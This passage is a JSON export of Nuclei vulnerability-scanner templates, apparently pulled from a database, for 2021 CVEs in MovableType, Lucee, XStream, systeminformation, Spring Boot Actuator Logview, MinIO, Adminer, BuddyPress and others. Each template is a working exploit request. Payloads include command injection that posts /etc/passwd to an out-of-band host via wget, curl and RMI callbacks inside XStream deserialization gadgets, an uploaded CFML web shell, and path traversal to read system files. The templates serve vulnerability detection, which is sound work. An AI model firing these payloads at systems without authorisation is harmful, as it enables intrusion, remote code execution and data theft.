\"{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect\"\n - \"{{BaseURL}}/realms/master/clients-registrations/default\"\n - \"{{BaseURL}}/realms/master/clients-registrations/openid-connect\"\n\n body: \"{\\\"Test\\\":1}\"\n stop-at-first-match: true\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Unrecognized field \"Test'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 400\n# digest: 4a0a0047304502210094de0f55e8db0485dedb6be0b0faaa6737f8e5b40905c4c59b87598da6efa7c502203624957dc717497acf2a1ab8c0aee02060f4b9fc6fd22b24111abb850f2b07ab:922c64590222798bb761d5b6d8e72950", "hash": "8927ca6d8e658e7d0abe702550d13565", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308269" }, "name": "CVE-2021-20792.yaml", "content": "id: CVE-2021-20792\n\ninfo:\n name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of WordPress Quiz and Survey Master plugin (7.1.14) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf\n - https://quizandsurveymaster.com/\n - https://jvn.jp/en/jp/JVN65388002/index.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20792\n - https://plugins.trac.wordpress.org/changeset?new=2503364%40quiz-master-next%2Ftrunk%2Fphp%2Fadmin%2Fquizzes-page.php&old=2490516%40quiz-master-next%2Ftrunk%2Fphp%2Fadmin%2Fquizzes-page.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20792\n cwe-id: CWE-79\n epss-score: 0.00183\n epss-percentile: 0.54675\n cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: expresstech\n product: quiz_and_survey_master\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,authenticated,wpscan,expresstech\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=mlw_quiz_list&s=\">&paged=\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220278c989b9dc1803a0640da64a5a9b5d1f8dc007e0d7b724e3218b431ffc98f2f022100f203b37e7d96545de9a199b34f1bab451c9ec9b3825d84d3ff9db7e9c3694bcd:922c64590222798bb761d5b6d8e72950", "hash": "a30c90fc93ad6d99113a69c57faca516", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826a" }, "name": "CVE-2021-20837.yaml", "content": "id: CVE-2021-20837\n\ninfo:\n name: MovableType - Remote Command Injection\n author: dhiyaneshDK,hackergautam\n severity: critical\n description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.\n reference:\n - https://nemesis.sh/posts/movable-type-0day/\n - https://github.com/ghost-nemesis/cve-2021-20837-poc\n - https://twitter.com/cyber_advising/status/1454051725904580608\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20837\n - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20837\n cwe-id: CWE-78\n epss-score: 0.96998\n epss-percentile: 0.99689\n cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*\n metadata:\n max-request: 1\n vendor: sixapart\n product: movable_type\n tags: cve2021,cve,packetstorm,rce,movable,sixapart\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n mt.handler_to_coderef\n \n \n \n \n {{base64(\"`wget http://{{interactsh-url}}`\")}}\n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n words:\n - \"failed loading package\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d0675892f5cec9c4449982110497fde27efa75037b1885e51f4b4dcf0340a1db022100c191c1f76092756f549a6f2692918433952d4d0a25a3c7f4833c36650fa39e9d:922c64590222798bb761d5b6d8e72950", "hash": "92a08a2eb08ed5db1537a43ebe584a52", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826b" }, "name": "CVE-2021-21087.yaml", "content": "id: CVE-2021-21087\n\ninfo:\n name: Adobe ColdFusion - Cross-Site Scripting\n author: Daviey\n severity: medium\n description: |\n Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability.\n reference:\n - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html\n - https://twitter.com/Daviey/status/1374070630283415558\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21087\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-21087\n cwe-id: CWE-79\n epss-score: 0.00186\n epss-percentile: 0.54967\n cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*\n metadata:\n max-request: 7\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve2021,cve,xss,adobe,misc,coldfusion\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - 'eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a8a85ba3feb3fc5625cd71d82087d10be42d642fd896fd5f96a35a9272ddff9402200a01ef82246294f6757e64c15356058aa6d3fc266364ca44ea705b2258a34ca5:922c64590222798bb761d5b6d8e72950", "hash": "dbea2b64b3a3bdacfcdf817d8a85e1f8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826c" }, "name": "CVE-2021-21234.yaml", "content": "id: CVE-2021-21234\n\ninfo:\n name: Spring Boot Actuator Logview Directory Traversal\n author: gy741,pikpikcu\n severity: high\n description: |\n spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\".\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information stored on the server.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator.\n reference:\n - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234\n - https://github.com/cristianeph/vulnerability-actuator-log-viewer\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21234\n - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772\n - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/1c76e1ec3588c9f39e1a94bf27b5ff56eb8b17d6\n - https://blog.csdn.net/qq_39583774/article/details/123023770#t5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2021-21234\n cwe-id: CWE-22\n epss-score: 0.96798\n epss-percentile: 0.99621\n cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: spring-boot-actuator-logview_project\n product: spring-boot-actuator-logview\n tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\"\n - \"{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\"\n - \"{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../\"\n - \"{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"contains(header,'text/plain')\"\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(header,'text/plain')\"\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 490a00463044022033ebb435f1795b6a06bd29b9bee7de4e687a08dc848035c641304f25a05044420220421167babce74e7aa10b543e135d291d7ec87aeacc8ca03950f34bd210e9ea7a:922c64590222798bb761d5b6d8e72950", "hash": "1a77cb7e6eeee4e7c3799219074dc4bf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826d" }, "name": "CVE-2021-21287.yaml", "content": "id: CVE-2021-21287\n\ninfo:\n name: MinIO Browser API - Server-Side Request Forgery\n author: pikpikcu\n severity: high\n description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Apply the latest security patches or updates provided by MinIO to fix this vulnerability.\n reference:\n - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q\n - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html\n - https://github.com/minio/minio/pull/11337\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21287\n - https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2021-21287\n cwe-id: CWE-918\n epss-score: 0.97112\n epss-percentile: 0.99745\n cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: minio\n product: minio\n tags: cve,cve2021,minio,ssrf,oast\n\nhttp:\n - raw:\n - |\n POST /minio/webrpc HTTP/1.1\n Host: {{interactsh-url}}\n Content-Type: application/json\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\n Content-Length: 76\n\n {\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\": \"Test\"},\"method\":\"web.LoginSTS\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\" # Confirms the HTTP Interaction\n\n - type: word\n words:\n - \"We encountered an internal error\"\n# digest: 490a004630440220193a42a5351b971d266989af20781c196488aca759067dbc1f0e8f2308d5c64802206f9ed4e250e668bc8a8acae05ca9632ea520a07ef3eca8bee272b8bdd6cc44bf:922c64590222798bb761d5b6d8e72950", "hash": "078ba2dcb443d3f916dc5ac2e1d75c4b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826e" }, "name": "CVE-2021-21307.yaml", "content": "id: CVE-2021-21307\n\ninfo:\n name: Lucee Admin - Remote Code Execution\n author: dhiyaneshDk\n severity: critical\n description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.\n reference:\n - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r\n - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21307\n - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response\n - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21307\n cwe-id: CWE-862\n epss-score: 0.97312\n epss-percentile: 0.99864\n cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: lucee\n product: lucee_server\n tags: cve2021,cve,rce,lucee,adobe\n\nhttp:\n - raw:\n - |\n POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n imgSrc=a\n - |\n POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n imgSrc=\n \n\n \n \n \n \n \n
    Command:value=\"#form.cmd#\">
    Options: value=\"#form.opts#\">
    Timeout: value=\"#form.timeout#\"\n value=\"5\">
    \n \n \n \n \n \n \n \n 
    \n      # HTMLCodeFormat(myVar)#
    \n - |\n POST /lucee/{{randstr}}.cfm HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: application/x-www-form-urlencoded\n\n cmd=id&opts=&timeout=5\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"groups=\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"(u|g)id=.*\"\n# digest: 4b0a00483046022100dcc24fb2eb777eff956bdecff0f00a86f51d0137fee0f7436e9a61d975a3f83d022100d09f18044914a741d17e4d1c9f15f0c229d19093066f6e7ee379376d585ed0ea:922c64590222798bb761d5b6d8e72950", "hash": "249d6de56aa2417054ea07f24a445727", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826f" }, "name": "CVE-2021-21311.yaml", "content": "id: CVE-2021-21311\n\ninfo:\n name: Adminer <4.7.9 - Server-Side Request Forgery\n author: Adam Crosser,pwnhxl\n severity: high\n description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.\n remediation: Upgrade to version 4.7.9 or later.\n reference:\n - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6\n - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf\n - https://packagist.org/packages/vrana/adminer\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21311\n - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cve-id: CVE-2021-21311\n cwe-id: CWE-918\n epss-score: 0.01485\n epss-percentile: 0.85417\n cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 6\n vendor: adminer\n product: adminer\n shodan-query: title:\"Login - Adminer\"\n fofa-query: app=\"Adminer\" && body=\"4.7.8\"\n hunter-query: app.name=\"Adminer\"&&web.body=\"4.7.8\"\n tags: cve2021,cve,adminer,ssrf\n\nhttp:\n - raw:\n - |\n POST {{path}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n\n payloads:\n path:\n - \"/index.php\"\n - \"/adminer.php\"\n - \"/adminer/adminer.php\"\n - \"/adminer/index.php\"\n - \"/_adminer.php\"\n - \"/_adminer/index.php\"\n\n attack: batteringram\n stop-at-first-match: true\n redirects: true\n max-redirects: 1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"400 - Bad Request\"\n - \"<title>400 - Bad Request</title>\"\n condition: or\n\n - type: status\n status:\n - 403\n# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950", "hash": "cfb4bace0cc706f2e0d72b682cce0f0a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308270" }, "name": "CVE-2021-21315.yaml", "content": "id: CVE-2021-21315\n\ninfo:\n name: Node.JS System Information Library <5.3.1 - Remote Command Injection\n author: pikpikcu\n severity: high\n description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package \"systeminformation\") is an open source collection of functions to retrieve detailed hardware, system and OS information.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected\n reference:\n - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC\n - https://security.netapp.com/advisory/ntap-20210312-0007/\n - https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v\n - https://www.npmjs.com/package/systeminformation\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21315\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2021-21315\n cwe-id: CWE-78\n epss-score: 0.97233\n epss-percentile: 0.99827\n cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: systeminformation\n product: systeminformation\n framework: node.js\n tags: cve,cve2021,nodejs,kev,systeminformation,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"wget --post-file /etc/passwd {{interactsh-url}}\"\n - name\n - running\n - pids\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200c1047dcc90c189900f05fb35827af9ae07e546fd18b576cdf2fab02e506f6b4022100adf613b9c43079b8e63825c8282c41fd892e632b5fd81854a70bd1737ca542c1:922c64590222798bb761d5b6d8e72950", "hash": "6d8769d6f5edcf5b5e8aff7281231dad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308271" }, "name": "CVE-2021-21345.yaml", "content": "id: CVE-2021-21345\n\ninfo:\n name: XStream <1.4.16 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: critical\n description: |\n XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.\n reference:\n - https://x-stream.github.io/CVE-2021-21345.html\n - http://x-stream.github.io/changes.html#1.4.16\n - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21345\n - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.9\n cve-id: CVE-2021-21345\n cwe-id: CWE-78,CWE-502\n epss-score: 0.4876\n epss-percentile: 0.9721\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n \n \n \n \n \n \n \n com.sun.corba.se.impl.activation.ServerTableEntry\n \n \n \n \n com.sun.corba.se.impl.activation.ServerTableEntry\n verify\n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n 1\n \n \n UTF-8\n \n \n \n \n \n \n curl http://{{interactsh-url}}\n \n \n \n \n \n \n \n \n \n 3\n javax.xml.ws.binding.attachments.inbound\n javax.xml.ws.binding.attachments.inbound\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a00473045022100c57ea9d8cecf995608fe7d5b0128a9e6783b30e14e86bd3ba5820cc61fb13e5c02204144080c1e53f2cbea11cc5770c68b6014c15e5d0215a769eadff83ae34e16d0:922c64590222798bb761d5b6d8e72950", "hash": "93d93788089d9fdb253400cf6ddddcce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308272" }, "name": "CVE-2021-21351.yaml", "content": "id: CVE-2021-21351\n\ninfo:\n name: XStream <1.4.16 - Remote Code Execution\n author: pwnhxl\n severity: critical\n description: |\n XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351\n - https://x-stream.github.io/CVE-2021-21351.html\n - https://paper.seebug.org/1543/\n - http://x-stream.github.io/changes.html#1.4.16\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21351\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2021-21351\n cwe-id: CWE-434\n epss-score: 0.73084\n epss-percentile: 0.98014\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n ysomap\n \n \n \n -10086\n \n <__overrideDefaultParser>false\n false\n false\n \n \n \n \n \n false\n false\n \n \n \n \n 1008\n true\n 1000\n 0\n 2\n 0\n 0\n 0\n true\n 1004\n false\n rmi://{{interactsh-url}}/test\n \n \n \n \n \n \n \n \n \n com.sun.rowset.JdbcRowSetImpl\n setAutoCommit\n \n boolean\n \n \n \n false\n \n \n false\n \n false\n \n -1\n false\n false\n \n 1\n \n 1\n false\n \n \n \n ysomap\n \n test\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950", "hash": "f18e5e5a752da2abfe20c22923a3d85d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308273" }, "name": "CVE-2021-21389.yaml", "content": "id: CVE-2021-21389\n\ninfo:\n name: BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution\n author: lotusdll\n severity: high\n description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system.\n remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.\n reference:\n - https://github.com/HoangKien1020/CVE-2021-21389\n - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/\n - https://codex.buddypress.org/releases/version-7-2-1/\n - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21389\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-21389\n cwe-id: CWE-863\n epss-score: 0.83143\n epss-percentile: 0.98347\n cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: buddypress\n product: buddypress\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress\n\nhttp:\n - raw:\n - |\n POST /wp-json/buddypress/v1/signup HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json; charset=UTF-8\n\n {\n \"user_login\":\"{{randstr}}\",\n \"password\":\"{{randstr}}\",\n \"user_name\":\"{{randstr}}\",\n \"user_email\":\"{{randstr}}@interact.sh\"\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"user_login\"\n - \"registered\"\n - \"activation_key\"\n - \"user_email\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b0e1b8d49d9fe1a59d88506d5d75e0740c560db375170a3e174b0f722115311a022100fc37abd7b4479a1a735a9447124a0e20493872640be3cca1318a98db23cb9662:922c64590222798bb761d5b6d8e72950", "hash": "20ef862842b8ecad496b95f99f1760a6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308274" }, "name": "CVE-2021-21402.yaml", "content": "id: CVE-2021-21402\n\ninfo:\n name: Jellyfin <10.7.0 - Local File Inclusion\n author: dwisiswant0\n severity: medium\n description: |\n Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.\n impact: |\n Successful exploitation could allow an attacker to read sensitive files on the server.\n remediation: This is fixed in version 10.7.1.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/\n - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx\n - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1\n - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21402\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-21402\n cwe-id: CWE-22\n epss-score: 0.15589\n epss-percentile: 0.95782\n cpe: 